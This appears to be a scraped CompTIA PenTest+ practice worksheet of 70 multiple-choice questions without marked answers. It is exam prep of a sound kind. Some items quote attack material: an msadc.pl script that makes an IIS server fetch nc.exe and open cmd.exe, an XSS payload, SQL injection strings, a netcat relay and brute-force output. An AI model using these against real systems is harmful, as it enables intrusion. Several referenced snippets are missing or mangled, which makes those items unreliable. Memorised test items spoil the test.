WorksheetsCompTia Pentest+ Dump
Total questions: 70
Worksheet time: 35mins
You have been hired as a penetration tester by an organization that wants you to conduct a risk assessment of their DMZ. The company provided Rules of Engagement states that you must do all penetration testing from an external IP address without being given any prior knowledge of the internal IT system architecture. What kind of penetration test have you been hired to perform?
White box
Grey box
Red team
Black box
What is a common Service Oriented Architecture Protocol (SOAP) vulnerability?
Cross-site scripting
SQL injection
VPath injection
XML denial of service issue
What should be done next if the final set of security controls does not eliminate all of the risk in a given system?
You should continue to apply additional controls until there is zero risk
You should ignore any remaining risk
You should accept the risk if the residual risk is low enough
You should remove the current controls since they are not completely effective
An organization is currently accepting bids for a contract that will involve penetration testing and reporting. The organization is asking all bidders to provide proof of previous penetration testing and reporting experience. One contractor decides to print out a few reports from some previous penetration tests that they performed. What could have occurred as a result of this contractor’s actions?
The contractor will have their bid accepted with a special pay bonus because of their excellent work on previous penetration tests
The contractor may have inadvertently exposed numerous vulnerabilities they had found at other companies on previous assessments
The organization accepting the bids will want to use the reports as an example of the format for all bidders to use in the future
The company accepting the bids will hire the contractor because of the quality of the reports he submitted with his bid
What is a formal document that states what will and will not be performed during a penetration test?
SOW
MSA
NDA
Corporate Policy
What is a legal contract outlining the confidential material or information that will be shared by the pentester and the organization during an assessment?
SOW
MSA
NDA
Corporate Policy
What is not a step in the NIST SP 800-115 Methodology?
Planning
Discovery
Reporting
Scoping
What is not an example of a type of support resource that a pentester might receive as part of a white box assessment?
Network diagrams
SOAP project files
XSD
PII of employees
What type of assessment seeks to validate a systems security posture against a particular checklist?
Compliance-based
Objective-based
Goal-based
Red Team
What type of threat actor is highly funded and often backed by nation states?
APT
Hacktivist
Script Kiddies
Insider Threat
If you are unable to ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to try to elicit a response from a host using TCP, what tool would you use?
Hping
Traceroute
TCP ping
Broadcast ping
What system contains a publicly available set of databases with registration contact information for every domain name on the Internet?
WHOIS
IANA
CAPTCHA
IETF
A penetration tester hired by a bank began searching for the bank’s IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank’s employees came into and left work, searching job postings (with a special focus on the bank’s information technology jobs), and even searching the corporate office of the bank’s dumpster. Based on this description, what portion of the penetration test is being conducted?
Information reporting
Vulnerability assessment
Active information gathering
Passive information gathering
You have conducted a Google search for the “site:webserver.com -site:sales.webserver.com financial”. What results do you expect to receive?
Google results matching all words in the query
Google results matching “financial” in domain webserver.com, but no results from the site sales.webserver.com
Google results for keyword matches from the site sales.webserver.com that are in the domain webserver.com but do not include the word financial
Google results for keyword matches on webserver.com and sales.webserver.com that include the word “financial”
What command could be used to list the running services from the Windows command prompt?
sc query type= running
sc query \\servername
sc query
sc config
Windows file servers commonly hold sensitive files, databases, passwords and more. What common vulnerability is usually used against a windows file server to expose sensitive files, databases, and passwords?
Cross-site scripting
SQL injection
Missing patches
CRLF injection
A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately the firm locked the file with a password so the potential employee cannot fill-in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?
Man-in-the-middle attack
Brute-force attack
Dictionary attack
Session hijacking
An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the main lobby of the building until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?
Man trap
Tailgating
Shoulder surfing
Social engineering
Through which type of method is information collected during the passive reconnaissance?
Social engineering
Network traffic sniffing
Man in the middle attacks
Publicly accessible sources
What kind of attack is an example of IP spoofing?
SQL injections
Man-in-the-middle
Cross-site scripting
ARP poisoning
What type of scan will measure the size or distance of a person's external features with a digital video camera?
Iris scan
Retinal scan
Facial recognition scan
Signature kinetics scan
What technique does a vulnerability scanner use in order to detect a vulnerability on a specific service?
Port scanning
Banner grabbing
Fuzzing
Analyzing the response received from the service when probed
A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public web server. The analyst opens the terminal on a Kali Linux workstation and uses netcat to gather some information. Based on the command and the response shown, what type of action did the analyst perform?
Cross-site scripting attack
Banner grabbing
SQL injection attack
Query to the Whois database
Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6. What type of activity occurred?
Port scan targeting 10.10.3.2
Fragmentation attack targeting 10.10.3.6
Denial of service attack targeting 10.10.3.6
Port scan targeting 10.10.3.6
A cyber security analyst is conducting a port scan of 192.168.1.45 using NMAP. During the scan, the analyst found numerous ports open and the NMAP software was unable to determine the Operating System version of the system installed at 192.168.1.45. You have been asked by the analyst to look over the results of their NMAP scan below: Starting NMAP 7.60 at 2017-12-02 16:19 NMAP scan report for 192.168.1.45 Host is up (0.78s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:0C:29:18:6B:DB What is the likely Operating System for the host?
Host is likely a Windows server
Host is likely a Linux server
Host is likely a Windows workstation
Host is likely a printer
You walked up behind a penetration tester in your organization and see the following output on their Kali Linux terminal: [ATTEMPT] target 172.17.182.162 - login "root" - pass "abcde" 1 of 10 [ATTEMPT] target 172.17.182.162 - login "root" - pass "efghj" 2 of 10 [ATTEMPT] target 172.17.182.162 - login "root" - pass "12345" 3 of 10 [ATTEMPT] target 172.17.182.162 - login "root" - pass "67890" 4 of 10 [ATTEMPT] target 172.17.182.162 - login "root" - pass "alb2c" 5 of 10 [ATTEMPT] target 172.17.182.162 - login "user" - pass "abcde" 6 of 10 [ATTEMPT] target 172.17.182.162 - login "user" - pass "efghj" 7 of 10 [ATTEMPT] target 172.17.182.162 - login "user" - pass "12345" 8 of 10 [ATTEMPT] target 172.17.182.162 - login "user" - pass "67890" 9 of 10 [ATTEMPT] target 172.17.182.162 - login "user" - pass "alb2c" 10 of 10 What is the penetration tester currently working on conducting?
Conducting a port scan of 172.17.182.162
Conducting a brute force login attempt of a remote service on 172.17.182.162
Conducting a ping sweep of 172.17.182.162/24
Conducting a Denial of Service attack on 172.17.182.162
A security analyst wants to implement a layered defense posture for this network, so he decides to use multiple layers of antivirus defense, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?
Forensic attack
ARP spoofing attack
Social engineering attack
Scanning attack
What technique is most effective in determining whether or not increasing end-user security training would be beneficial to the organization during your technical assessment of their network?
Vulnerability scanning
Social engineering
Application security testing
Network sniffing
What type of malicious application does not require user intervention or another application to act as a host in order for it to replicate?
Macro
Worm
Trojan
Virus
What kind of security vulnerability would a newly discovered flaw in a software application be considered?
Input validation flaw
HTTP header injection vulnerability
Zero-day vulnerability
Time-to-check to time-to-use flaw
A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the web server. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands: system("perl msadc.pl -h user>tempfile\" "); system("perl msadc.pl -h pass>tempfile\" "); system("perl msadc.pl -h $host -C \"echo bin>tempfile\" "); system("perl msadc.pl -h $host -C \"echo get nc.exe>tempfile\" "); system("perl msadc.pl -h $host -C \"echo get hacked.html>tempfile\" "); ("perl msadc.pl -h $host -C \"echo quit>tempfile\" "); system("perl msadc.pl -h $host -C \"ftp -s:\\tempfile\" "); $0; print "Opening FTP connection...\n"; system("perl msadc.pl -h port -e cmd.exe\" "); Which exploit is indicated by this script?
Buffer overflow exploit
Chained exploit
SQL injection exploit
Denial of Service exploit
An insurance company has developed a new web application to allow their customers to choose and apply for an insurance plan. You have been asked to help perform a security review of the new web application. You have discovered that the application was developed in ASP and uses MSSQL for its backend database. You have been able to locate application's search form and introduced the following code in the search input field: IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");> originalAttribute="SRC" originalPath="vbscript:msgbox('Vulnerable_to_Attack ');>" When you click submit on the search form, your web browser returns a pop-up window that says "Vulnerable_to_Attack". What vulnerability did you discover in the web application?
Cross-site request forgery
Command injection
Cross-site scripting
SQL injection
A security analyst is conducting a log review of the company's webserver and found two suspicious entries: [04Jan2018 10:07:23] "GET /logon.php?user=test'+or+7>12 00-- HTTP/1.1" 200 5825 [04Jan2018 10:10:03] "GET /logon.php?user=admin';%20-- HTTP/1.1" 200 5845 The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. php include('../.../config/db_connect.php'); user= _GET['user'] pass= _GET['pass'] sql= user' AND password = '$pass'"; result=MySQLquery( sql) or die ("couldn't execute query"); if (MySQL_num_rows($result) !=0 ) echo 'Authentication granted!'; else echo 'Authentication failed!'; ?> Based on source code analysis, what type of vulnerability is this webserver vulnerable to?
Command injection
SQL injection
Directory traversal
LDAP injection
While conducting a penetration test of an organization's web applications, you attempt to insert the following script into the search form on the company's web site: You then clicked the search button and a pop-up box appears on your screen showing the following text, "This site is vulnerable to an attack!" Based on this response, what vulnerability have you uncovered in the web application?
Buffer overflow
Cross-site request forgery
Distributed denial of service
Cross-site scripting
A security analyst conducts an NMAP scan of a server and found that port 25 is open. What risk might this server be exposed to?
Open file/print sharing
Web portal data leak
Clear text authentication
Open mail relay
Which of the following a characteristic of a "Blind" SQL Injection vulnerability?
Administrator of the vulnerable application cannot see the request to the web server
Application properly filters the user input, but it is still vulnerable to code injection in a "Blind" attack
Administrator of the affected application does not see an error message during a successful attack
Attacker cannot see any of the display errors with information about the injection during a "Blind" attack
A pentester is trying to map the organization's internal network. The analyst enters the following command (nmap -n -sS -T4 -p 80 10.0.3.0/24). What type of scan is this?
Quick Scan
Intense Scan
Stealth Scan
Comprehensive Scan
What type of technique does exploit chaining often implement?
Injecting parameters into a connection string using semicolons as a separator
Inserting malicious JavaScript code into input parameters
Setting a user's session identifier (SID) to an explicit known value
Adding multiple parameters with the same name in HTTP requests
Which of these statements is true concerning LM hashes?
LM hashes consist in 48 hexadecimal characters
LM hashes are based on AES128 cryptographic standard
Uppercase characters in the password are converted to lowercase
LM hashes are not generated when the password length exceeds 15 characters
A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization’s LAN. What is the best method for the penetration tester to use to conduct the pivot?
Issue the pivot exploit and setup meterpreter
Reconfigure the network settings in meterpreter
Set the payload to propagate through meterpreter
Create a route statement in meterpreter
Your team is developing an update to a piece of code that allows customers to update their billing and shipping addresses in the web application. The shipping address field used in the database was designed with a limit of 75 characters. Your team's web programmer has brought you some algorithms that may help to prevent an attacker from trying to conduct a buffer overflow attack by submitting invalid input to the shipping address field. Which pseudo code represents the best solution to prevent this issue?
if (shippingAddress = 75) {update field} else exit
if (shippingAddress != 75) {update field} else exit
if (shippingAddress >= 75) {update field} else exit
if (shippingAddress <= 75) {update field} else exit
A security engineer is using the Kali Linux operating system and is writing exploits in C++. What command should they use to compile their new exploit and name it notepad.exe?
g++ exploit.cpp -o notepad.exe
g++ exploit.py -o notepad.exe
g++ exploit.pl -o notepad.exe
g++ --compile -i exploit.cpp -o notepad.exe
What should administrators perform to reduce the attack surface of a system and to remove unnecessary software, services, and insecure configuration settings?
Harvesting
Windowing
Hardening
Stealthing
A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst has verified the web server and Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the mostly likely method that the attacker used to change the sale price of the items purchased?
SQL injection
Changing hidden form values
Buffer overflow attack
Cross-site scripting
An attacker was able to gain access to your organization's network closet while posing as a HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use?
Fraggle
MAC Flood
Smurf
Tear Drop
What programming language is most vulnerable to buffer overflow attacks?
Swift
C++
Python
Java
You have been hired to perform a web application security test. During the test, you notice that the site is dynamic and therefore must be using a backend database. You decide you want to test to determine if the site is susceptible to a SQL injection. What is the first character that you should use to attempt breaking a valid SQL request?
Semicolon
Single quote
Exclamation mark
Double quote
What NMAP switch would a hacker use to attempt to see which ports are open on a targeted network?
-s0
-sP
-sS
-sU
Your organization’s networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using NMAP, how can you scan all 4 subnets using a single command?
nmap -p 10.0.0-3.0
nmap -P 10.0.0/23
nmap -P 10.0.0.0,1.0,2.0,3.0
nmap -p 10.0.0.0/25
An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?
Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080.
Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443.
Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080.
Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76.
What tool can be used to scan a network to perform vulnerability checks and compliance auditing?
NMAP
Metasploit
Nessus
BeEF
An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker was able to locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?
Cupp
Nessus scripting engine
Cain and Abel
Netcat
An attacker is using the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?
locate type=ns
request type=ns
set type=ns
transfer type=ns
What NMAP switch would you use to perform operating system detection?
-OS
-sO
-sP
-O
What problem can be solved by using Wireshark?
Tracking source code version changes
Validating the creation dates of webpages on a server
Resetting the administrator password on three different server
Performing packet capture and analysis on a network
What tool is used to collect wireless packet data?
Aircrack-ng
John the Ripper
Nessus
Netcat
What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A stealth scan, scanning ports 80 and 443
A stealth scan, scanning ports 80 to 443
A stealth scan, scanning all open ports excluding ports 80 to 443
A stealth scan, determine operating system, and scanning ports 80 to 443
What type of weakness is John the Ripper used to test during a technical assessment?
Usernames
File permissions
Firewall rulesets
Passwords
You are logged into the Windows command prompt and want to find what systems are "alive" in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?
ping 172.16.0.0
ping 172.16.0.255
for %X in (1 255) do PING 172.16.0.%X
for /L %X in (1 254) do PING -n 1 172.16.0.%X | FIND /I "Reply"
A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ in order for the Chief Security Officer to be able to work from his home office after hours. What rule should the administrator add to the firewall?
Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
Permit 143.27.43.32 161.212.71.14 RDP 3389
Permit 143.27.43.32 161.212.71.0/24 RDP 3389
Permit 143.27.43.0/24 161.212.71.14 RDP 3389
A recently hired security employee at a bank was asked to perform daily scans of the bank’s intranet in order to look for unauthorized devices. The new employee decides to create a script that scans the network for unauthorized devices every morning at 2:00 am. What programming language would work best to create this script?
PHP
C#
Python
ASP.NET
What must be developed in order to show security improvements over time?
Reports
Testing tools
Metrics
Taxonomy of vulnerabilities
What activity is not a part of the post-engagement cleanup?
Removing shells
Removing tester-created credentials
Removing tools
Modifying log files
What is not one of the three categories of solutions that all of the pentester's recommended mitigations should fall into?
People
Process
Technology
Problems
During a penetration test, you conduct an exploit that creates a denial of service condition by crashing the httpd server. What should you do?
Immediately contact the organization and inform them of the issue
Continue with the exploitation
Pivot to another machine
Contact the organization's customer service department and conduct further information gathering
What term describes the amount of risk an organization is willing to accept?
Risk appetite
Risk mitigation
Risk acceptance
Risk avoidance
During a penetration test, you find a hash value that is related to malware associated with an APT. What best describes what you have found?
Indicator of compromise
Botnet
SQL injection
XSRF
What should NOT be included in your final report for the assessment and provided to the organization?
Executive summary
Methodology used
Findings and recommendations
Detailed list of costs incurred
When you are managing a risk, what is considered an acceptable option?
Reject it
Deny it
Mitigate it
Initiate it
After issuing the command "telnet jasondion.com 80" and connecting to the server, what command is used to conduct the banner grab?
HEAD / HTTP/1.1
PUT / HTTP/1.1
HEAD / HTTP/2.0
PUT / HTTP/2.0
